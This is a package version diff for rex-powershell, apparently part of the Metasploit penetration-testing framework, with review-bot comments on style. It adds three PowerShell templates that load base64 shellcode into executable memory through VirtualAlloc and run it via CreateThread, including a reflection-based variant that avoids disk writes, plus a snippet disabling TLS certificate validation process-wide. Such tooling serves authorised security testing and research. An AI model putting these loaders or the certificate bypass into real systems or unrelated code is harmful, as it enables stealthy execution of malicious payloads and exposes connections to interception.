rex-powershell 0.1.64 → 0.1.65
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_dotnet.ps1.template +30 -0
- data/data/templates/to_mem_old.ps1.template +20 -0
- data/data/templates/to_mem_pshreflection.ps1.template +27 -0
- data/lib/rex/powershell.rb +1 -0
- data/lib/rex/powershell/psh_methods.rb +1 -1
- data/lib/rex/powershell/templates.rb +19 -0
- data/lib/rex/powershell/version.rb +1 -1
- metadata +6 -2
- metadata.gz.sig +0 -0
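--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA1:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 7822116e9e48c0d7ee82d13dac3ca52079e470ba
+data.tar.gz: c950c71437f158f5fca8bd307671b04812619b34
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: b9846114f3bb39ecd7dd3a5ab424918ddd1d974c59c4939173a514d213b0b1cc30a6040d63cab575f1f14b62665e8311c18f79ccef14be98fcc10c81f1221c1d
+data.tar.gz: 3f69f77edd8116afeb60279c2e95de5a1d6a8ad685f58688519ec41be9f231600a821ee15637d155cf607e4b9ba3165b30f1c938e5d639e4a48b8de95ebb2bc7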
checksums.yaml.gz.sig
CHANGED
Binary file
data.tar.gz.sig
CHANGED
Binary file
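--- /dev/null
+++ b/data/data/templates/to_mem_dotnet.ps1.template
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+using System;
+using System.Runtime.InteropServices;
+namespace %{var_kernel32} {
+public class func {
+[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+}
+}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)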
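--- /dev/null
+++ b/data/data/templates/to_mem_old.ps1.template
@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)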
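--- /dev/null
+++ b/data/data/templates/to_mem_pshreflection.ps1.template
@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+Param ($%{var_module}, $%{var_procedure})
+$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+Param (
+[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+)
+
+$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+
+return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null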
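--- a/data/lib/rex/powershell.rb
+++ b/data/lib/rex/powershell.rb
@@ -70,7 +70,7 @@ module Powershell
 # @return [String] Powershell code to disable SSL verification
 # checks.
 def self.ignore_ssl_certificate
-'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
+'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
 end
 
 #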
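Review bot: The YARD comment above `ignore_ssl_certificate` (hunk lines 70-71) is not updated for this change: it still says only "Powershell code to disable SSL verification checks", while the returned fragment is now terminated with `;`, which is what a caller concatenating snippets relies on, and it does not say that the callback it installs on the static `ServicePointManager` applies to every TLS connection the hosting process makes afterwards, not just one request. Suggest `# @return [String] Powershell statement (terminated with ';') that installs an always-true ServerCertificateValidationCallback, disabling certificate validation process-wide for the generated script.` Callers that previously appended their own `;` will now emit `;;`, which PowerShell appears to accept as an empty statement but is worth a check in the snippet assembly code, which is outside this hunk.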
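--- /dev/null
+++ b/data/lib/rex/powershell/templates.rb
@@ -0,0 +1,19 @@
+module Rex
+module Powershell
+module Templates
+
+# The base directory that all Powershell script templates live in
+TEMPLATE_DIR = File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )
+
+# The powershell script template for memory injection using .NET
+TO_MEM_DOTNET = File.join(TEMPLATE_DIR, 'to_mem_dotnet.ps1.template')
+
+# The powershell script template for memory injection using reflection
+TO_MEM_REFLECTION = File.join(TEMPLATE_DIR, 'to_mem_pshreflection.ps1.template')
+
+# The powershell script template for memory injection using the old method
+TO_MEM_OLD = File.join(TEMPLATE_DIR, 'to_mem_old.ps1.template')
+
+end
+end
+end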
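Review bot: `TEMPLATE_DIR` (hunk line 6) is built as `File.expand_path( File.join( __FILE__ , '..', '..', '..', '..', 'data', 'templates') )`, which works but is hard to read and has stray spacing inside both parentheses; the idiomatic one-liner is `TEMPLATE_DIR = File.expand_path('../../../../data/templates', __FILE__)`, which makes the "four directories up from lib/rex/powershell/templates.rb" intent visible. The three `TO_MEM_*` constants are mutable `String`s; appending `.freeze` to each (or a `# frozen_string_literal: true` magic comment at the top of the file) prevents a caller from accidentally mutating a shared path. A short comment on the module saying these are file paths rather than template contents, and that the `%{...}` placeholders inside them are presumably filled by the caller (confirm against the template loading code, which is not in this diff), would save the next reader a trip to the templates directory.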
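--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-version: 0.1.
+version: 0.1.65
 platform: ruby
 authors:
 - David 'thelightcosine' Maloney
@@ -85,7 +85,7 @@ cert_chain:
 2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
 QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
 -----END CERTIFICATE-----
-date: 2016-
+date: 2016-10-03 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: bundler
@@ -175,6 +175,9 @@ files:
 - Rakefile
 - bin/console
 - bin/setup
+- data/templates/to_mem_dotnet.ps1.template
+- data/templates/to_mem_old.ps1.template
+- data/templates/to_mem_pshreflection.ps1.template
 - lib/rex/powershell.rb
 - lib/rex/powershell/command.rb
 - lib/rex/powershell/function.rb
@@ -185,6 +188,7 @@ files:
 - lib/rex/powershell/payload.rb
 - lib/rex/powershell/psh_methods.rb
 - lib/rex/powershell/script.rb
+- lib/rex/powershell/templates.rb
 - lib/rex/powershell/version.rb
 - rex-powershell.gemspec
 homepage: https://github.com/rapid7/rex-powershell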
metadata.gz.sig
CHANGED
Binary file